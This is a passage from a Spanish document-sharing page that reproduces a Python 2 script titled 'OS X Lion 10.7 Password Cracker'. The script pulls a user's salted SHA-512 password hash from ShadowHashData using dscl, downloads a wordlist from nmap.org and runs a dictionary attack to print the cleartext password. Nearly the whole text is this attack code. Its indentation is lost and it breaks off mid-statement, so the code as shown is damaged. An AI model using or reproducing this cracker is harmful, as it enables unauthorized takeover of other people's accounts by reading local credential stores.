Crack Os Lion Root
Enviado por lunetas77 • 18 de Marzo de 2012 • 356 Palabras (2 Páginas) • 553 Visitas
##########################################
#* OS X Lion 10.7 Password Cracker
from subprocess import *
import hashlib
import os
import urllib2
import sys
from string import *
link = "http://nmap.org/svn/nselib/data/passwords.lst" # Online password file
defaultuser = False
username = ""
def check(password): # Hash password and compare
if not password.startswith("#!"): # Ignore comments
guess = hashlib.sha512(salt_hex + password).hexdigest()
print("Trying... " + password)
if guess == hash:
print("Cleartext password for user '"+username+"' is : "+password)
exit(0)
if len(sys.argv) < 2:
print("No username given. Defaulting to current user.")
defaultuser = True
else:
username = sys.argv[1]
p = Popen("whoami", shell=True, stdout=PIPE)
whoami = p.communicate()[0]
if defaultuser:
username = whoami.rstrip()
p = Popen("dscl localhost -read /Search/Users/" + username, shell=True, stdout=PIPE)
dscl_out = p.communicate()[0]
list = dscl_out.split("\n")
for pos,item in enumerate(list): # extract digest
if "dsAttrTypeNative:ShadowHashData" in item:
digest = list[pos+1].replace(" ", "")
if len(digest) == 262: # Out of box configuration
salt = digest[56:64]
hash = digest[64:192]
elif len(digest) == 314: # SMB turned on
print("SMB is on")
salt
...